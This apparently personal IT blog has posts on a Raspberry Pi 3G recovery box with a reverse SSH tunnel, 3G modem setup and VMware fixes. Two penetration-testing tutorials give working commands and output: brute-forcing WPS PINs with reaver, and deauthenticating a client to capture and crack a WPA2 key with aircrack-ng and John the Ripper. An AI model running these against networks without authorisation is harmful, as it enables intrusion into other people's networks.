Recovery Pi

17 07 2012

My previous single Raspberry Pi posts have been steps towards my “Recovery Pi”

a small self sufficient system that can be shipped to
a remote site to facilitate serial (console) & network
(mgmt lan) connectivity to the remote devices

• Raspberry Pi ($45)

• USB->Serial Convertor ($30)

• Cisco Console Cable

• Telstra 3G “Elite” USB Modem ($29)
– Telstra AUS Mobile Internet $180/year (365 day access | 1.46c per MB in AUS | $15.36 per MB Intl Roaming)

• 8GB SDHC Mem Card ($10)

• USB Power Brick (~10hrs run) ($20)

• USB Powered Hub ($18)

• Total Retail Startup Cost: $152 AUD

===Built on the existing Debian Squeeze image===

===Telstra 3G USB Modem===

root@raspberrypi:~# apt-get install usb-modeswitch pppd

root@raspberrypi:~# dmesg | grep ttyUSB
usb 1-1.2.4: GSM modem (1-port) converter now attached to ttyUSB0
usb 1-1.2.4: GSM modem (1-port) converter now attached to ttyUSB1
usb 1-1.2.4: GSM modem (1-port) converter now attached to ttyUSB2
usb 1-1.2.3: pl2303 converter now attached to ttyUSB3

root@raspberrypi:~# cat /etc/chatscripts/telstra
” ‘ATZ’
OK ‘ATQ0 V1 E1′
OK ‘AT&D2 &C1′
OK ‘ATS0=0′
OK ‘AT+CGDCONT=1,”IP”,”telstra.internet”‘
OK ‘ATDT*99#’

root@raspberrypi:~# cat /etc/ppp/peers/telstra
connect “/usr/sbin/chat -v -f /chatscripts/telstra”

root@raspberrypi:~# pon

root@raspberrypi:~# ifconfig ppp0
ppp0      Link encap:Point-to-Point Protocol
inet addr:  P-t-P:  Mask:
RX packets:705 errors:0 dropped:0 overruns:0 frame:0
TX packets:624 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:3
RX bytes:621353 (606.7 KiB)  TX bytes:40301 (39.3 KiB)

root@raspberrypi:~# poff

===3G Connection On Boot===

root@raspberrypi:~# cat /etc/network/interfaces
# Used by ifup(8) and ifdown(8). See the interfaces(5) manpage or
# /usr/share/doc/ifupdown/examples for more information.

auto lo
iface lo inet loopback

auto ppp0
iface ppp0 inet ppp
provider telstra

===Reverse SSH Connection & AutoSSH===

root@raspberrypi:~# ssh-keygen

root@raspberrypi:~# ssh-copy-id recoverypi@jumphost

root@raspberrypi:~# ssh -R 2222:localhost:22 recoverypi@jumphost

root@raspberrypi:~# apt-get install autossh

root@raspberrypi:~# autossh -M 20000 -f -N -R 2222:localhost:22 recoverypi@jumphost  -i /root/.ssh/id_rsa

Add the command into /etc/rc.local before the “exit 0” line & you are good to go on every reboot.

autossh -M 20000 -f -N -R 2222:localhost:22 recoverypi@jumphost  -i /root/.ssh/id_rsa

– Connect to your JumpBox & verify the Pi has “phoned home”

recoverypi@jumpbox:~$ netstat -ant | grep 2222
tcp 0 0* LISTEN
tcp6 0 0 ::1:2222 :::* LISTEN

– Connect across the reverse SSH tunnel to the Pi

recoverypi@jumpbox:~$ ssh root@ -p 2222
root@’s password:
Linux raspberrypi 3.1.9+ #84 Fri Apr 13 12:27:52 BST 2012 armv6l

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Jul 17 22:27:42 2012 from raspberrypi


root@raspberrypi:~# apt-get install minicom

root@raspberrypi:~# minicom -D /dev/ttyUSB3 -b 9600 -o

Welcome to minicom 2.4

Compiled on Sep  7 2010, 01:26:06.
Port /dev/ttyUSB3

Press CTRL-A Z for help on special keys

border-rtr#sh ver
Cisco Internetwork Operating System Software
IOS ™ C2600 Software (C2600-IO3-M), Version 12.2(46a), RELEASE SOFTWARE (fc1)


root@raspberrypi:~# apt-get install xinetd tftpd tftp

root@raspberrypi:~# vi /etc/xinetd.d/tftp

service tftp
protocol        = udp
port            = 69
socket_type     = dgram
wait            = yes
user            = nobody
server          = /usr/sbin/in.tftpd
server_args     = /tftpboot
disable         = no

root@raspberrypi:~# mkdir /tftpboot
root@raspberrypi:~# chmod -R 777 /tftpboot
root@raspberrypi:~# chown -R nobody /tftpboot

root@raspberrypi:~# /etc/init.d/xinetd stop
Stopping internet superserver: xinetd.
root@raspberrypi:~# /etc/init.d/xinetd start
Starting internet superserver: xinetd.

Telstra3G USB in Linux

23 06 2012

Telstra 3G USB Dongles are good for connectivity on the go.

root@bt:~# lsusb | grep ZTE
Bus 001 Device 005: ID 19d2:0031 ONDA Communication S.p.A. ZTE MF110/MF636

root@bt:~# dmesg | grep ttyUSB
[ 2306.101269] usb 1-4: GSM modem (1-port) converter now attached to ttyUSB0
[ 2306.101613] usb 1-4: GSM modem (1-port) converter now attached to ttyUSB1
[ 2306.102140] usb 1-4: GSM modem (1-port) converter now attached to ttyUSB2
[ 2306.102487] usb 1-4: GSM modem (1-port) converter now attached to ttyUSB3

There is a hard way using wvdial etc – or an easy way. I chose the easy way – a great little script called sakis3g


wget “”
gunzip sakis3g.gz
chmod +x sakis3g
./sakis3g –interactive


root@bt:~/scripts# ./sakis3g connect USBINTERFACE=”3″ APN=”telstra.internet”

root@bt:~/scripts# ./sakis3g connect info
MF626s connected to Telstra (50501).
Connection Information

Interface: P-t-P (ppp0)

Connected since: 2012-06-11 20:52
Kilobytes received: 376
Kilobytes sent: 57

Network ID: 50501
Operator name: Telstra
APN: telstra.internet

Modem: MF626s
Modem type: USB
Kernel driver: option
Device: /dev/ttyUSB2

IP Address:
Subnet Mask:
Peer IP Address:
Default route(s):

root@bt:~/scripts# ./sakis3g disconnect

Large URL List Processing

9 02 2012

So – a quick detour came to my attention in the form of a list of urls.

These 680 odd urls were neatly formatted in a list, and lets for this excercise say they presented an image.

Now what – copy & paste each one into a browser to see if it works – FAIL.


So – using simple cli-fu I verified the URLs were valid & then created a page, embedding them all in there.

First – run your list through wget to verify its valid & working

# wget –spider -i urls.txt -T 2 -t 1 -nv -o urls.out

Then just grep for the HTTP 200 OK string out of urls.out

# grep “200 OK” urls.out > urls.out.httpok

Then tack on the html code so you can browse them all at once

# cat urls.httpok | awk ‘{print “\<img width=\”200px\” src=\””$4″\”\ />”}’ > urls.htm

Then simply fire it up in your favourite browser

# firefox urls.htm

P2V the VMware way

26 01 2012

VMware converter standalone is a free download:

Got Yas:
Insufficient permissions to connect to xxxxxxx ADMIN$ for Windows XP machine you are trying to convert

run gpedit.msc

– Computer Configuration

 – Windows Settings

  – Security Settings

   – Local Policies

    – Security Option

     – Network access: Sharing and security model for local accounts


By default XP has the Sharing and security model for local accounts set to “Guest only – local users authenticate as Guest” – this needs to be changed to “Classic – local users authenticate as themselves”

This way you can access the machine remotely with the admin account & do the conversion.

identify & crack your WPS enabled AP

25 01 2012

##DISCLAIMER## – as usual, only use on devices you have approval for or own.

I hadn’t looked much at reaver yet – although had been following the news since it was released in Dec. Reaver allows you to brute force the WPS 8 numeric digit pin (easy setup / config feature) on a WiFi AP rather than trying to brute force the PSK. WPS is enabled by default on most newer (last few years) consumer routers to get certification.

Main tools:
– reaver (crack AP) & wash (identify AP vuln to WPS brute forcing)
– the python script (circa 2009) allows you to fingerprint the AP (Make / Model / Serial etc) that has WPS enabled

Go here & download reaver 1.4 (latest at time of writing) – don’t just apt-get install as you don’t get wash

Do the install dance on your distro (works on BT5r1)

# tar zxvf reaver-1.4.tar.gz
# ./config
# make
# make install

You can also use a fun little python script called (not to be confused with the WordPress tool) to fingerprint the AP

Step 1: Interface into monitor mode

# airmon-ng start wlan0

Step 2: Identify a WPS enabled (vulnerable) AP using wash included with reaver

# wash –i mon0

Step 3: Fingerprint with

# ./ –i mon0

Step 4: run reaver against it …… grab a coffee / lunch / sleep – can take several hours to brute force the WPS pin

# reaver -i mon0 -b -AP MAC ADDRESS- -v

This will [should] result in returning the pin & psk of the wifi router – you can simply then connect.

WPS PIN: ‘15736942’
WPA PSK: ‘somesecure&reallyl0ngpskhere’
AP SSID: ‘p0wn3d’

WPA2 network cracking

27 09 2011

So – everyone has cracked WEP & everyone knows it has a couple of seconds security around it.

This time I am getting connected to a WPA2 / PSK protected network.

Couple of things you will need

  • Backtrack (I am using 5r1 )
  • A wordlist – google is your friend here but there is a 3169 word list at /pentest/passwords/john/password.lst to get you started
  • A wireless card
  • A WPA or WPA2 network protected with a pre-shared key (your own of course)

==Drop the interface into monitor mode==

root@bt:~# airmon-ng start wlan0

Interface    Chipset        Driver

wlan0        Zydas zd1211    zd1211rw - [phy1]
(monitor mode enabled on mon0)

==Find your target wireless network==

root@bt:~# airodump-ng mon0

 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 38:E7:D8:AD:B2:0E    0       61        0    0  11  54e  WPA2 CCMP   PSK  Wireless

==Start capturing==

root@bt:~# airodump-ng mon0 --channel 11 --bssid 38:E7:D8:AD:B2:0E -w /tmp/wpa2

 CH 11 ][ BAT: 3 hours 51 mins ][ Elapsed: 7 mins ][ 2011-09-26 21:24                                         

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID                           

 38:E7:D8:AD:B2:0E    0 100     4319       83    0  11  54e  WPA2 CCMP   PSK  Wireless                        

 BSSID              STATION            PWR   Rate    Lost  Packets  Probes                                    

 38:E7:D8:AD:B2:0E  00:03:6D:F4:F8:86    0    1 -48      0       81  Wireless

So now that you are capturing the traffic, we can either wait for a user to connect, or deauth an existing one….

==Deauth an existing user to get the 4 way handshake==

root@bt:~# aireplay-ng -0 1 -a 38:E7:D8:AD:B2:0E -c 00:03:6D:F4:F8:86 mon0
21:25:49  Waiting for beacon frame (BSSID: 38:E7:D8:AD:B2:0E) on channel 11
21:25:50  Sending 64 directed DeAuth. STMAC: [00:03:6D:F4:F8:86] [62|63 ACKs]

Once the user is connected, you see the WPA handshake in the top right corner

CH 11 ][ BAT: 3 hours 43 mins ][ Elapsed: 1 min ][ 2011-09-26 21:27 ][ WPA handshake: 38:E7:D8:AD:B2:0E

BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

38:E7:D8:AD:B2:0E    0  96      807       28    0  11  54e  WPA2 CCMP   PSK  Wireless

BSSID              STATION            PWR   Rate    Lost  Packets  Probes

38:E7:D8:AD:B2:0E  00:03:6D:F4:F8:86    0   54 - 6      0      161

Now, the best bit of this over WEP cracking is that we no longer need to be anywhere near the network. The cracking is done offline.

==The easy way (No garuntee this will work)==

There are two ways to tackle this – at the end of the day, you need to brute force the password, but having a decent wordlist gives you a huge advantage over a,b,c,d 1,2,3,4 etc.

This is the secret sauce – without a decent wordlist, you got nothing.

For this example we will just use the one that comes with JTR in BT

root@bt:~# aircrack-ng -w /pentest/passwords/john/password.lst -b 38:E7:D8:AD:B2:0E /tmp/wpa*.cap
Opening /tmp/wpa2-01.cap
Opening /tmp/wpa2-02.cap
Reading packets, please wait...

                                 Aircrack-ng 1.1 r1904

                   [00:00:00] 48 keys tested (489.60 k/s)

                           KEY FOUND! [ sunshine ]

      Master Key     : 02 A7 BC 5F 24 67 CA 2A B5 FC F0 01 1E D5 9B 2C 
                       8B 42 A5 A8 C6 55 6B 33 4A 09 8B 07 84 D3 C0 1D 

      Transient Key  : 3F 56 FD 2B 2F CE FA D9 55 14 84 2F 53 31 42 BF 
                       8C FE 11 78 9F 51 48 33 97 62 E1 C6 D7 B1 9C 6C 
                       6B D7 5A 1C 11 22 3F 0B 7E 1D 42 51 5E 55 F4 28 
                       D2 3A DB 75 81 DD 4E BB 64 51 29 86 AA 55 06 7B 

      EAPOL HMAC     : 17 6E 91 77 A2 A9 F1 C5 6F 33 02 4D 59 64 8A 9B 

BOOHYA – our WPA2 PSK is sunshine

==The hard way (but will EVENTUALLY find it)==

root@bt:~# /pentest/passwords/john/john --stdout --incremental:all | aircrack-ng -b 38:E7:D8:AD:B2:0E -w - /tmp/wpa2*.cap
Opening /tmp/wpa2-01.cap
Opening /tmp/wpa2-02.cap
Reading packets, please wait...

                                 Aircrack-ng 1.1 r1904

                   [00:00:22] 11484 keys tested (534.50 k/s)

                           KEY FOUND! [ sunshine ]

      Master Key     : 02 A7 BC 5F 24 67 CA 2A B5 FC F0 01 1E D5 9B 2C 
                       8B 42 A5 A8 C6 55 6B 33 4A 09 8B 07 84 D3 C0 1D 

      Transient Key  : 3F 56 FD 2B 2F CE FA D9 55 14 84 2F 53 31 42 BF 
                       8C FE 11 78 9F 51 48 33 97 62 E1 C6 D7 B1 9C 6C 
                       6B D7 5A 1C 11 22 3F 0B 7E 1D 42 51 5E 55 F4 28 
                       D2 3A DB 75 81 DD 4E BB 64 51 29 86 AA 55 06 7B 

      EAPOL HMAC     : 17 6E 91 77 A2 A9 F1 C5 6F 33 02 4D 59 64 8A 9B 

So thats it … no smoke … no mirrors … Get the capture of a handshake, then brute force the key from it 😀

Remember this the next time you are thinking of a PSK for your wireless router.

A good page to read about password strength & get a feel for what it takes to brute force different passwords is the Password Haystacks page by Steve Gibson (

vsphere client on Windows 7

9 03 2011

So as it always seems to happen, the few apps you really want to work …. dont.

I loaded up the vSphere client under Windows 7 & it failed to connect to my ESXi host, nor would it connect to my Virtual Centre server.

It just fell in a heap with the following errors ……

“Error parsing the server “server name” clients.xml” file.”


“The type initializer for ‘VirtualInfrastructure.Utils.HttpWebRequestProxy’ threw an exception.”

After much Google trawling later, I came across the solution.

  • Create lib folder under the Launcher folder

C:\Program Files\VMware\Infrastructure\Virtual Infrastructure Client\Launcher\lib

  • Copy system.dll into the lib folder, or if you prefer to grab your own dll from the %SystemRoot%\Microsoft.NET\Framework\v2.0.50727\ directory of a Windows XP machine with .NET v3.5 SP1 installed.

C:\Program Files\VMware\Infrastructure\Virtual Infrastructure Client\Launcher

The only change in the config file is the addition of the following lines:

<developmentMode developerInstallation=”true”/>

before the last </configuration> close tag.

  • Create a new system variable

DEVPATH=C:\Program Files\VMware\Infrastructure\Virtual Infrastructure Client\Launcher\lib

  • Change the VpxClient.exe app to run as an administrator:

If all things went well – you should now just be able to launch the vSphere client & admin your machines as you did before.